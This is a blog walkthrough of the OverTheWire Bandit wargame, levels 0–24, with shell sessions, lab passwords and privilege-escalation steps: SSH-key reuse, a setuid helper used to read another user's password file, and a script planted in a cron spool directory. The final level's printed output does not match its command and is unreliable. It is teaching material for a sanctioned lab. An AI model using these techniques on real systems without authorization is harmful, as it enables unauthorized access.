Recently I’ve been obsessed with a wargaming site called overthewire.org. At the time of this writing I have made it through a few of the servers already, but I will post my solutions to the entry level server they offer, “Bandit”. This is also the recommended place to start if you are new to the site. You should already be familiar with basic Linux commands before attempting this wargame. However, the first page of Bandit explains what to do if you don’t know a command. You do need to use a bit of your own intuition to figure out how to make it from one level to the next.
I have been through a good handful of wargaming sites in the past and I find this one to be of good quality with an interesting variety of servers to play. For those who don’t know what a wargame is, a wargame in hacking is a security challenge in which one must exploit a vulnerability in a system or application or gain access to a computer system. Most of the servers here are about program exploitation on the Linux platform. We do not have to be on a Linux system to play these. But why not? If you have access to a Linux box, a real terminal is the way to go. PuTTY is the way to go on Windows. But I digress. Use my posted solutions to learn and understand the levels or compare with your own solutions. Enjoy!
Level 0:
We simply ssh to bandit0@bandit.labs.overthewire.org using the password bandit0 and we are in our shell.
Level 0 -> 1:
Once in, we can see that the readme file is in our home directory. Simply “cat” it and grab the password for level1.
    bandit0@melissa:~$ ls
    readme
    bandit0@melissa:~$ cat readme
    boJ9jbbUNNfktd78OOpsqOltutMc3MY1
Level 1-> 2:
We are told that the password is in a file called “-”. cat treats a bare dash as standard input, so we need to delimit the dash by giving the file a path (./-) to read it.
    bandit1@melissa:~$ ls
    -
    bandit1@melissa:~$ cat ./-
    CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
Level 2 ->3:
This time we simply need to read a file with spaces in its name. Let’s surround the file name in quotes.
    bandit2@melissa:~$ ls
    spaces in this filename
    bandit2@melissa:~$ cat "spaces in this filename"
    UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
Level 3->4:
We are told the file we need is in a hidden file in the inhere directory.
    bandit3@melissa:~$ ls
    inhere
    bandit3@melissa:~$ cd inhere
    bandit3@melissa:~/inhere$ ls -la
    total 12
    drwxr-xr-x 2 root root 4096 2012-05-10 23:51 .
    drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
    -rw-r----- 1 bandit4 bandit3 33 2012-05-10 23:51 .hidden
    bandit3@melissa:~/inhere$ cat .hidden
    pIwrPrtPN36QITSp3EQaw936yaFoFgAB
Level 4 ->5:
We are told the password is somewhere in the inhere directory and is the only human readable file in the directory. Let’s see what file types we have.
    bandit4@melissa:~$ ls
    inhere
    bandit4@melissa:~$ cd inhere
    bandit4@melissa:~/inhere$ ls -la
    total 48
    drwxr-xr-x 2 root root 4096 2012-05-10 23:51 .
    drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file00
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file01
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file02
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file03
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file04
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file05
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file06
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file07
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file08
    -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file09
    bandit4@melissa:~/inhere$ file ./-*
    ./-file00: data
    ./-file01: data
    ./-file02: data
    ./-file03: data
    ./-file04: data
    ./-file05: data
    ./-file06: data
    ./-file07: ASCII text
    ./-file08: data
    ./-file09: data
    bandit4@melissa:~/inhere$ cat ./-file07
    koReBOKuIDDepwhWk7jZC0RTdopnAYKh
Level 5-> 6:
This is similar to the previous level, except we have some more file attributes to look for, as well as more files to look through.
    bandit5@melissa:~$ ls
    inhere
    bandit5@melissa:~$ cd inhere
    bandit5@melissa:~/inhere$ ls -la
    total 88
    drwxr-x--- 22 root bandit5 4096 2012-05-10 23:51 .
    drwxr-xr-x 3 root root 4096 2012-05-10 23:51 ..
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere00
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere01
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere02
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere03
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere04
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere05
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere06
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere07
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere08
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere09
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere10
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere11
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere12
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere13
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere14
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere15
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere16
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere17
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere18
    drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere19
    bandit5@melissa:~/inhere$ find ./ -size 1033c
    ./maybehere07/.file2
    bandit5@melissa:~/inhere$ cat ./maybehere07/.file2
    DXjZPULLxYr17uwoI01bNLQbtFemEgo7
Level 6->7:
The file can be anywhere on the server, but we are given its attributes. This is a job for find. The redirection attached to the end of the command (2>/dev/null) gets rid of garbage returns and allows viewing of our password file amongst several others with the same attributes.
    bandit6@melissa:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
    /var/lib/dpkg/info/bandit7.password
    bandit6@melissa:~$ cat /var/lib/dpkg/info/bandit7.password
    HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
Level 7->8:
The password for the next level is stored in the file data.txt next to the word millionth. We can pipe cat to grep for this.
    bandit7@melissa:~$ ls
    data.txt
    bandit7@melissa:~$ cat data.txt | grep millionth
    millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV
Level 8->9:
Here we need to find a unique line among many. We can pipe a few commands together to do this. Note the commands do need to be in this order: uniq only compares adjacent lines, so the input has to be sorted first.
    bandit8@melissa:~$ ls
    data.txt
    bandit8@melissa:~$ cat data.txt | sort | uniq -u
    UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
Level 9->10:
The password for the next level is stored in the file data.txt among a few lines of human-readable strings starting with ‘=’ characters.
    bandit9@melissa:~$ ls
    data.txt
    bandit9@melissa:~$ strings data.txt | grep '='
    ========== the
    R=ev2,
    NF=!^
    M5Q=
    ========== password
    TuI@=
    ========== iss
    c =$
    w=RO
    eD=p
    jR=JlB
    G========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
    :=*1p
    KA=%
We can see our password string amongst our output.
Level 10->11:
The password for the next level is stored in the file data.txt, which contains base64 encoded data. We need to decode the file.
    bandit10@melissa:~$ ls
    data.txt
    bandit10@melissa:~$ base64 -d data.txt
    The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
Level 11->12:
The password is encoded using simple rot13 encryption. There are many options to solve this including using various scripting languages and simply using an online rot13 decoder. Let’s try a solution in our shell.
    bandit11@melissa:~$ ls
    data.txt
    bandit11@melissa:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M
    The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
That command is given on the Wikipedia page for ROT13.
Level 12->13:
The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it is necessary to create a directory under /tmp in which you can work using mkdir. We need to decompress and check the file over and over again until we get the right format.
    bandit12@melissa:~$ ls
    data.txt
    bandit12@melissa:~$ file data.txt
    data.txt: ASCII text
    bandit12@melissa:~$ mkdir /tmp/stw
    bandit12@melissa:~$ cd /tmp/stw
    bandit12@melissa:/tmp/stw$ xxd -r ~/data.txt > data.txt
    bandit12@melissa:/tmp/stw$ file data.txt
    data.txt: gzip compressed data, was "data2.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
    bandit12@melissa:/tmp/stw$ zcat data.txt > dataNew
    bandit12@melissa:/tmp/stw$ ls
    dataNew  data.txt
    bandit12@melissa:/tmp/stw$ file dataNew
    dataNew: bzip2 compressed data, block size = 900k
    bandit12@melissa:/tmp/stw$ bzip2 -d dataNew
    bzip2: Can't guess original name for dataNew -- using dataNew.out
    bandit12@melissa:/tmp/stw$ ls
    dataNew.out  data.txt
    bandit12@melissa:/tmp/stw$ file dataNew.out
    dataNew.out: gzip compressed data, was "data4.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
    bandit12@melissa:/tmp/stw$ zcat dataNew.out > evenNewer
    bandit12@melissa:/tmp/stw$ ls
    dataNew.out  data.txt  evenNewer
    bandit12@melissa:/tmp/stw$ file evenNewer
    evenNewer: POSIX tar archive (GNU)
    bandit12@melissa:/tmp/stw$ tar -xvf evenNewer
    data5.bin
    bandit12@melissa:/tmp/stw$ file data5.bin
    data5.bin: POSIX tar archive (GNU)
    bandit12@melissa:/tmp/stw$ tar -xvf data5.bin
    data6.bin
    bandit12@melissa:/tmp/stw$ file data6.bin
    data6.bin: bzip2 compressed data, block size = 900k
    bandit12@melissa:/tmp/stw$ bzip2 -d data6.bin
    bzip2: Can't guess original name for data6.bin -- using data6.bin.out
    bandit12@melissa:/tmp/stw$ ls
    data5.bin  data6.bin.out  dataNew.out  data.txt  evenNewer
    bandit12@melissa:/tmp/stw$ file data6.bin.out
    data6.bin.out: POSIX tar archive (GNU)
    bandit12@melissa:/tmp/stw$ tar -xvf data6.bin.out
    data8.bin
    bandit12@melissa:/tmp/stw$ file data8.bin
    data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
    bandit12@melissa:/tmp/stw$ zcat data8.bin > lost
    bandit12@melissa:/tmp/stw$ ls
    data5.bin  data6.bin.out  data8.bin  dataNew.out  data.txt  evenNewer  lost
    bandit12@melissa:/tmp/stw$ file lost
    lost: ASCII English text
    bandit12@melissa:/tmp/stw$ cat lost
    The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
At last, we have our password.
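The decompress-and-check loop above can be scripted. The following is an added example, not part of the original walkthrough: it starts from the binary that xxd -r produces, identifies each layer by its magic bytes instead of calling file, and gives up after a fixed number of layers. The function names and the sample file it builds are assumptions made for the illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): peel nested gzip/bzip2/tar
# layers until plain data remains, identifying each layer by magic bytes.

# layer_type FILE -> prints gzip, bzip2, tar or plain
layer_type() {
    local magic
    magic=$(od -An -tx1 -N3 "$1" | tr -d ' \n')
    case "$magic" in
        1f8b*)  echo gzip;  return 0 ;;
        425a68) echo bzip2; return 0 ;;
    esac
    # tar has no leading magic; the string "ustar" sits at offset 257.
    if [ "$(dd if="$1" bs=1 skip=257 count=5 2>/dev/null | tr -d '\0')" = "ustar" ]; then
        echo tar
    else
        echo plain
    fi
}

# unwrap FILE WORKDIR [MAX_LAYERS] -> prints the path of the innermost file
unwrap() {
    local cur work max n next
    cur=$1; work=$2; max=${3:-20}; n=0
    while [ "$n" -lt "$max" ]; do
        next="$work/layer$((n + 1))"
        case "$(layer_type "$cur")" in
            gzip)  gzip  -dc "$cur" > "$next" || return 1 ;;
            bzip2) bzip2 -dc "$cur" > "$next" || return 1 ;;
            tar)
                # Only single-member archives are expected here. -O streams the
                # member to stdout, so its stored name never becomes a path.
                [ "$(tar -tf "$cur" | wc -l)" -eq 1 ] ||
                    { echo "tar layer has several members" >&2; return 1; }
                tar -xOf "$cur" > "$next" || return 1 ;;
            plain) printf '%s\n' "$cur"; return 0 ;;
        esac
        cur=$next
        n=$((n + 1))
    done
    echo "gave up after $max layers" >&2   # cap guards against endless nesting
    return 1
}

# make_sample DIR -> builds a constructed nested file (sample data, not the
# level's real file) and prints its path
make_sample() {
    local d
    d=$1
    printf 'The password is CONSTRUCTED-SAMPLE\n' > "$d/inner.txt"
    gzip -c "$d/inner.txt" > "$d/inner.gz"
    tar -cf "$d/inner.tar" -C "$d" inner.gz
    if command -v bzip2 >/dev/null 2>&1; then
        bzip2 -c "$d/inner.tar" > "$d/middle"
    else
        cp "$d/inner.tar" "$d/middle"      # bzip2 layer skipped if the tool is absent
    fi
    gzip -c "$d/middle" > "$d/sample.bin"
    printf '%s\n' "$d/sample.bin"
}

# Demo on the constructed sample: prints the innermost text.
demo_dir=$(mktemp -d)
cat "$(unwrap "$(make_sample "$demo_dir")" "$demo_dir")"
rm -rf "$demo_dir"
```

The layer cap matters outside a wargame too: a file that decompresses to another compressed file indefinitely would otherwise keep the loop running and fill the work directory.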
Level 13->14:
This one switches things up a little. The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. We need to borrow an SSH key to move on.
    bandit13@melissa:~$ ls
    sshkey.private
    bandit13@melissa:~$ ssh -i sshkey.private bandit14@localhost
    Could not create directory '/home/bandit13/.ssh'.
    The authenticity of host 'localhost (127.0.0.1)' can't be established.
    RSA key fingerprint is 9d:09:d9:46:84:df:f9:dd:cc:7c:dc:49:a0:95:b2:10.
    Are you sure you want to continue connecting (yes/no)? yes
    Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts).
    bandit14@melissa:~$ cat /etc/bandit_pass/bandit14
    4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
And just like that, we are dumped into bandit14’s shell.
Level 14->15:
The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost. Here we have a lesson in telnet. Basically, we will use telnet to connect to localhost on port 30000 and enter the password while we are still in bandit14’s shell.
    bandit14@melissa:~$ telnet localhost 30000
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
    Correct!
    BfMYroe26WYalil77FoDi9qh59eK5xNr
    Connection closed by foreign host.
Level 15->16:
The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption. Now we are using SSL commands. Nothing to it but to do it.
    bandit15@melissa:~$ openssl s_client -connect localhost:30001
    CONNECTED(00000003)
    depth=0 /CN=melissa.labs.overthewire.org
    verify error:num=18:self signed certificate
    verify return:1
    depth=0 /CN=melissa.labs.overthewire.org
    verify return:1
    ---
    Certificate chain
     0 s:/CN=melissa.labs.overthewire.org
       i:/CN=melissa.labs.overthewire.org
    ---
    Server certificate
    -----BEGIN CERTIFICATE-----
    [...]
    -----END CERTIFICATE-----
    subject=/CN=melissa.labs.overthewire.org
    issuer=/CN=melissa.labs.overthewire.org
    ---
    No client certificate CA names sent
    ---
    SSL handshake has read 1436 bytes and written 229 bytes
    ---
    New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
    Server public key is 2048 bit
    Secure Renegotiation IS supported
    Compression: zlib compression
    Expansion: zlib compression
    SSL-Session:
        Protocol  : TLSv1
        Cipher    : DHE-RSA-AES256-SHA
        Session-ID: 5AED820CF694E077E4F590C9089FC77A050DC3A3BBCE7F383B811CBD4937DAC9
        Session-ID-ctx:
        Master-Key: 201FB305DD48B3D4746DA988FD88B0EF939A766A393DFED1D9184DA6BD41B28F4ABDF06AE23DA7B0DEFF0329C69499E8
        Key-Arg   : None
        TLS session ticket:
        [...]
        Compression: 1 (zlib compression)
        Start Time: 1363810708
        Timeout   : 300 (sec)
        Verify return code: 18 (self signed certificate)
    ---
    BfMYroe26WYalil77FoDi9qh59eK5xNr
    Correct!
    cluFn7wTiGryunymYOu4RcffSxQluehd
    read:errno=0
After running our SSL command, we paste bandit15’s password into the prompt. We are then presented with bandit16’s password.
Level 16->17:
The password for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next password, the others will simply send back to you whatever you send to it.
Moving up with our network skills we are introduced to nmap. Let’s run some scans to find the listening server. Note netcat can also do basic port scans. Good to know because many systems have that by default and you may be in a situation where you cannot use nmap.
    bandit16@melissa:~$ nmap -p 31000-32000 localhost
    Starting Nmap 5.21 ( http://nmap.org ) at 2013-03-20 21:24 CET
    Nmap scan report for localhost (127.0.0.1)
    Host is up (0.0033s latency).
    Not shown: 996 closed ports
    PORT      STATE SERVICE
    31046/tcp open  unknown
    31518/tcp open  unknown
    31691/tcp open  unknown
    31790/tcp open  unknown
    31960/tcp open  unknown
    Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
    #We can see we have 5 ports open. Nmap does have a script scan to verify SSL, but it does not seem to work on this server.
    #Thus it's quicker to manually check each port. To speed this up, I will tell you I verified it on port 31790.
    bandit16@melissa:~$ openssl s_client -connect localhost:31790
    CONNECTED(00000003)
    depth=0 /CN=melissa.labs.overthewire.org
    verify error:num=18:self signed certificate
    verify return:1
    depth=0 /CN=melissa.labs.overthewire.org
    verify return:1
    ---
    Certificate chain
     0 s:/CN=melissa.labs.overthewire.org
       i:/CN=melissa.labs.overthewire.org
    ---
    Server certificate
    -----BEGIN CERTIFICATE-----
    [...]
    -----END CERTIFICATE-----
    subject=/CN=melissa.labs.overthewire.org
    issuer=/CN=melissa.labs.overthewire.org
    ---
    No client certificate CA names sent
    ---
    SSL handshake has read 1436 bytes and written 229 bytes
    ---
    New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
    Server public key is 2048 bit
    Secure Renegotiation IS supported
    Compression: zlib compression
    Expansion: zlib compression
    SSL-Session:
        Protocol  : TLSv1
        Cipher    : DHE-RSA-AES256-SHA
        Session-ID: 913086AEE63018EFB254F2105A4597FC5CB419BFFBCE5B1FAF10EC7967668530
        Session-ID-ctx:
        Master-Key: 155AF180C1B8BB81BDE85105A05F1C6D5E7B8511B6C9E83B257EC2012B102170522C965E114B233D108A838C7520DED6
        Key-Arg   : None
        TLS session ticket:
        [...]
        Compression: 1 (zlib compression)
        Start Time: 1363811727
        Timeout   : 300 (sec)
        Verify return code: 18 (self signed certificate)
    ---
    cluFn7wTiGryunymYOu4RcffSxQluehd
    Correct!
    -----BEGIN RSA PRIVATE KEY-----
    [...]
    -----END RSA PRIVATE KEY-----
    read:errno=0
    #Now we have an ssh key we can use. We need to copy it into a file to use it.
    bandit16@melissa:~$ mkdir /tmp/ssss
    bandit16@melissa:~$ cd /tmp/ssss
    bandit16@melissa:/tmp/ssss$ touch sshkey.private
    bandit16@melissa:/tmp/ssss$ vi sshkey.private
    bandit16@melissa:/tmp/ssss$ chmod 600 sshkey.private
    bandit16@melissa:/tmp/ssss$ ssh -i sshkey.private bandit17@localhost
    Could not create directory '/home/bandit16/.ssh'.
    The authenticity of host 'localhost (127.0.0.1)' can't be established.
    RSA key fingerprint is 9d:09:d9:46:84:df:f9:dd:cc:7c:dc:49:a0:95:b2:10.
    Are you sure you want to continue connecting (yes/no)? yes
    Failed to add the host to the list of known hosts (/home/bandit16/.ssh/known_hosts).
    bandit17@melissa:~$
At last, we have bandit17’s shell.
Level 17->18:
There are 2 files in the home directory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new.
There are a few ways to find the password for this level. One of the commands not mentioned makes really light work of this level, so we will go with that. Always remember, there is more than one way to skin a cat, especially with Linux.
    bandit17@melissa:~$ ls
    passwords.new  passwords.old
    bandit17@melissa:~$ diff passwords.new passwords.old
    42c42
    < kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
    ---
    > bECYSoXjOeGseirUCztuCBDF3xXqE7By
The string on top is what we want. A brief of level 18 introduces a new problem with our password…
Level 18->19:
The password for the next level is stored in a file readme in the home directory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH. When we try to connect to the shell at bandit18, we are presented with an error message. There is a way to sneak in commands when we try to connect. Let’s see.
    Byebye !
    Connection to bandit.labs.overthewire.org closed.
    ssh bandit18@bandit.labs.overthewire.org cat readme
    bandit18@bandit.labs.overthewire.org's password:
    IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
The password for bandit19 is presented to us just like that.
Level 19->20:
To gain access to the next level, you should use the setuid binary in the home directory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
The suid binary executes as bandit20, therefore we can exploit this to peek at bandit20’s password as bandit19. Example:
    bandit19@melissa:~$ ls
    bandit20-do
    bandit19@melissa:~$ ./bandit20-do
    Run a command as another user.
      Example: ./bandit20-do id
    bandit19@melissa:~$ ./bandit20-do id
    uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11020(bandit20),11019(bandit19)
    bandit19@melissa:~$ ./bandit20-do whoami
    bandit20
    bandit19@melissa:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
    GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Level 20->21:
There is a setuid binary in the home directory that does the following: it makes a connection to localhost on the port you specify as a command line argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
This one is a little more complicated. Upon entering bandit20’s shell, we see a binary that connects to a local port and waits for the password to be sent to it from the other side. We need two shells to accomplish this.
    bandit20@melissa:~$ ls
    suconnect
    bandit20@melissa:~$ ./suconnect
    Usage: ./suconnect <portnumber>
    This program will connect to the given port on localhost using TCP. If it receives the correct password from the other side, the next password is transmitted back.
    #In one shell do:
    bandit20@melissa:~$ nc -l 3222
    #In another shell do:
    bandit20@melissa:~$ ls
    suconnect
    bandit20@melissa:~$ ./suconnect 3222
    #When the connection is made, go back to the first shell, and paste the password in netcat.
    GbKksEFF4yrVs6il55v6gwY5aVje5f0j
    gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
    Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
    Password matches, sending next password
The password for bandit21 is given, we can move on.
Level 21->22:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
If you are not already familiar with what cron jobs are, you will learn now. Upon inspection of the cron directory, we see a job listed for bandit22. Its contents show that it executes a script that dumps the password for bandit22 to a file in /tmp. Looking at the contents of that file reveals the password for bandit22.
    bandit21@melissa:~$ cd /etc/cron.d/
    bandit21@melissa:/etc/cron.d$ ls -la
    total 100
    drwxr-xr-x 2 root root 4096 2013-01-03 16:39 .
    drwxr-xr-x 94 root root 4096 2013-03-18 15:53 ..
    -rw-r--r-- 1 root root 54 2013-01-03 16:39 boobiesbot-check
    -rw-r--r-- 1 root root 61 2012-07-05 09:34 cronjob_bandit22
    -rw-r--r-- 1 root root 61 2012-07-05 09:34 cronjob_bandit23
    -rw-r--r-- 1 root root 61 2012-07-05 09:35 cronjob_bandit24
    -rw-r--r-- 1 root root 35 2012-03-29 14:16 eloi0
    -rw-r--r-- 1 root root 35 2012-04-07 18:33 eloi1
    -rw-r--r-- 1 root root 51 2012-12-23 00:06 hintbot-check
    -rw------- 1 root root 233 2012-09-14 13:16 manpage3_resetpw_job
    -rw-r--r-- 1 root root 506 2012-06-19 03:06 php5
    -rw-r--r-- 1 root root 102 2011-01-05 11:23 .placeholder
    -rw-r--r-- 1 root root 58 2011-11-13 23:08 semtex0-32
    -rw-r--r-- 1 root root 58 2011-11-13 23:08 semtex0-64
    -rw-r--r-- 1 root root 59 2011-11-13 23:08 semtex0-ppc
    -rw-r--r-- 1 root root 36 2011-11-25 14:00 semtex10
    -rw-r--r-- 1 root root 143 2011-11-13 23:08 semtex12
    -rw-r--r-- 1 root root 35 2011-11-13 23:08 semtex5
    -rw-r--r-- 1 root root 29 2011-11-13 23:08 semtex6
    -rw-r--r-- 1 root root 96 2011-11-25 14:00 semtex8
    -rw-r--r-- 1 root root 134 2011-11-13 23:14 semtex9
    -rw-r--r-- 1 root root 29 2011-11-13 23:07 vortex0
    -rw-r--r-- 1 root root 30 2012-03-24 21:00 vortex20
    -rw-r--r-- 1 root root 52 2012-12-23 00:06 vulnbot0-check
    -rw-r--r-- 1 root root 52 2012-12-23 00:06 vulnbot1-check
    bandit21@melissa:/etc/cron.d$ cat cronjob_bandit22
    * * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
    bandit21@melissa:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
    #!/bin/bash
    chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
    cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
    bandit21@melissa:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
    Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Level 22->23:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
We visit cron again; this time the script cron executes is a little more complicated. It creates a file in /tmp that is the result of an md5 hashing process combined with a username which creates the name of the file that will hold the password. In other words, when run, it will provide the name of the file in the /tmp directory that the password is being dumped to. Let’s fill in the blanks for it as bandit23 and see what happens.
    bandit22@melissa:~$ cd /etc/cron.d
    bandit22@melissa:/etc/cron.d$ ls
    boobiesbot-check  eloi1                 semtex0-64   semtex6   vulnbot0-check
    cronjob_bandit22  hintbot-check         semtex0-ppc  semtex8   vulnbot1-check
    cronjob_bandit23  manpage3_resetpw_job  semtex10     semtex9
    cronjob_bandit24  php5                  semtex12     vortex0
    eloi0             semtex0-32            semtex5      vortex20
    bandit22@melissa:/etc/cron.d$ cat cronjob_bandit23
    * * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
    bandit22@melissa:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
    #!/bin/bash
    myname=$(whoami)
    mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
    echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
    cat /etc/bandit_pass/$myname > /tmp/$mytarget
    #Run the script:
    bandit22@melissa:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
    8ca319486bfbbc3663ea0fbe81326349
    #Check contents of that file in /tmp:
    bandit22@melissa:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
    jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
There we have it, the password for bandit23 awaits us.
Level 23->24:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
Our final challenge is more complicated. There are a couple of ways to complete this challenge as well, but I think the way I’m about to do it is one of the better ways. We can see that the cronjob for bandit24 is running all scripts in the /var/spool/bandit24 directory. Unfortunately, we do not have permissions to see the files in that directory. This is vulnerable because although we cannot read that directory, we can add scripts to it and the script will be executed as bandit24. Let’s add a script in that directory that lists all the files in that directory.
    bandit23@melissa:~$ cd /etc/cron.d
    bandit23@melissa:/etc/cron.d$ ls
    boobiesbot-check  eloi1                 semtex0-64   semtex6   vulnbot0-check
    cronjob_bandit22  hintbot-check         semtex0-ppc  semtex8   vulnbot1-check
    cronjob_bandit23  manpage3_resetpw_job  semtex10     semtex9
    cronjob_bandit24  php5                  semtex12     vortex0
    eloi0             semtex0-32            semtex5      vortex20
    bandit23@melissa:/etc/cron.d$ cat cronjob_bandit24
    * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
    bandit23@melissa:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
    #!/bin/bash
    myname=$(whoami)
    cd /var/spool/$myname
    echo "Executing and deleting all scripts in /var/spool/$myname:"
    for i in *;
    do
        echo "Handling $i"
        ./$i
        rm -f $i
    done
    #Let's begin the process to create our script:
    bandit23@melissa:/etc/cron.d$ mkdir /tmp/cccc
    bandit23@melissa:/etc/cron.d$ cd /tmp/cccc
    bandit23@melissa:/tmp/cccc$ vi dump.sh
    #!/bin/bash
    ls -la >> /tmp/cccc/list.txt
    #chmod 777 is probably overkill, this stuff gets erased.
    bandit23@melissa:/tmp/cccc$ chmod 777 dump.sh
    bandit23@melissa:/tmp/cccc$ chmod -R 777 /tmp/cccc
    bandit23@melissa:/tmp/cccc$ cp dump.sh /var/spool/bandit24/
    #Wait one minute for the cronjob to run then check our list.txt file:
    bandit23@melissa:/tmp/cccc$ cat list.txt
    total 100
    drwxr-xr-x 2 root root 4096 2013-01-03 16:39 .
    drwxr-xr-x 94 root root 4096 2013-03-18 15:53 ..
    -rw-r--r-- 1 root root 54 2013-01-03 16:39 boobiesbot-check
    -rw-r--r-- 1 root root 61 2012-07-05 09:34 cronjob_bandit22
    -rw-r--r-- 1 root root 61 2012-07-05 09:34 cronjob_bandit23
    -rw-r--r-- 1 root root 61 2012-07-05 09:35 cronjob_bandit24
    -rw-r--r-- 1 root root 35 2012-03-29 14:16 eloi0
    -rw-r--r-- 1 root root 35 2012-04-07 18:33 eloi1
    -rw-r--r-- 1 root root 51 2012-12-23 00:06 hintbot-check
    -rw------- 1 root root 233 2012-09-14 13:16 manpage3_resetpw_job
    -rw-r--r-- 1 root root 506 2012-06-19 03:06 php5
    -rw-r--r-- 1 root root 102 2011-01-05 11:23 .placeholder
    -rw-r--r-- 1 root root 58 2011-11-13 23:08 semtex0-32
    -rw-r--r-- 1 root root 58 2011-11-13 23:08 semtex0-64
    -rw-r--r-- 1 root root 59 2011-11-13 23:08 semtex0-ppc
    -rw-r--r-- 1 root root 36 2011-11-25 14:00 semtex10
    -rw-r--r-- 1 root root 143 2011-11-13 23:08 semtex12
